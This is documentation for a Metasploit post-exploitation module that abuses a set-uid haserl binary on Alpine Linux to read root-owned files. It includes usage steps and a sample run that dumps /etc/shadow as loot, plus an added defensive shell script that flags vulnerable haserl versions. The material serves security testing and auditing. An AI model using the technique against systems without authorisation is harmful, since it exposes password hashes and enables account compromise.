GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/linux/gather/haserl_read.md

## Vulnerable Application

Haserl is an unmaintained tool for using Lua as a CGI language in web servers. On Linux, when haserl is installed set-uid root, it attempts to drop its privileges to the uid/gid of the owner of the CGI script, similar to suexec in Apache.

Haserl could have been a thing of the past, but it is used by Alpine Linux's Alpine Configuration Framework (ACF), which is commonly deployed on that distribution.

This module exploits the fact that invoking the set-uid haserl binary on an arbitrary file makes it not only switch to that file owner's UID (so it stays root for a root-owned file such as `/etc/shadow`) but also print the file's contents.

This was fixed in haserl version 0.9.36.
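As an added example (not part of this module or the Metasploit project), a small POSIX shell audit helper that lists set-uid haserl binaries and compares their reported version against the fixed release 0.9.36. It assumes haserl answers `--version` with a version string and that the usual binary directories are the ones worth scanning.

```shell
#!/bin/sh
# Added audit helper, not part of the Metasploit module: reports set-uid
# haserl binaries whose version is older than the fixed release 0.9.36.

FIXED_VERSION="0.9.36"

# Returns 0 (true) if version $1 is older than version $2, comparing
# dot-separated numeric components (e.g. 0.9.35 < 0.9.36 < 0.10.0).
version_lt() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"; bi="${b%%.*}"
        [ "$a" = "$ai" ] && a="" || a="${a#*.}"
        [ "$b" = "$bi" ] && b="" || b="${b#*.}"
        ai="${ai:-0}"; bi="${bi:-0}"
        [ "$ai" -lt "$bi" ] && return 0
        [ "$ai" -gt "$bi" ] && return 1
    done
    return 1
}

# Prints "vulnerable" or "fixed" for a given haserl version string.
haserl_version_status() {
    if version_lt "$1" "$FIXED_VERSION"; then echo vulnerable; else echo fixed; fi
}

# Lists set-uid regular files named haserl* in the given directories
# (defaults to the usual binary paths; the module found /usr/bin/haserl-lua53).
find_setuid_haserl() {
    dirs="${*:-/usr/bin /usr/local/bin /usr/sbin}"
    for d in $dirs; do
        [ -d "$d" ] || continue
        find "$d" -maxdepth 1 -type f -name 'haserl*' -perm -4000 2>/dev/null
    done
}

# Audit entry point: one line per set-uid haserl binary with version and
# status. Assumes "haserl --version" prints a version-looking token.
audit_haserl() {
    find_setuid_haserl "$@" | while read -r bin; do
        ver=$("$bin" --version 2>/dev/null | grep -o '[0-9][0-9.]*' | head -n1)
        if [ -n "$ver" ]; then status=$(haserl_version_status "$ver"); else status=unknown; fi
        echo "$bin ${ver:-unknown} $status"
    done
}
```

Run `audit_haserl` with no arguments on an Alpine host to check the default paths; any line ending in `vulnerable` is a binary that should be upgraded or have its set-uid bit removed.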

## Prerequisites

  1. Install Alpine Linux

  2. Install haserl

## Verification Steps

  1. Start msfconsole

  2. Get a shell

  3. Do: `use post/linux/gather/haserl_read`

  4. Set `SESSION`

  5. Do: `run` or `exploit`

  6. Verify that the file was successfully downloaded

## Options

### RFILE

Remote file to read and download; defaults to `/etc/shadow`.

## Scenarios

```
msf6 > use post/linux/gather/haserl_read
msf6 post(linux/gather/haserl_read) > show options

Module options (post/linux/gather/haserl_read):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RFILE    /etc/shadow      yes       File to read
   SESSION  1                yes       The session to run this module on.

msf6 post(linux/gather/haserl_read) > run

[!] SESSION may not be compatible with this module.
[+] Found set-uid haserl: /usr/bin/haserl-lua53
[+] Shadow saved in: /home/user/.msf4/loot/20210301204020_default_192.168.138.113_haserl_shadow_107368.txt
[*] Post module execution completed
msf6 post(linux/gather/haserl_read) >
```

## Reference

  1. https://twitter.com/steaIth/status/1364940271054712842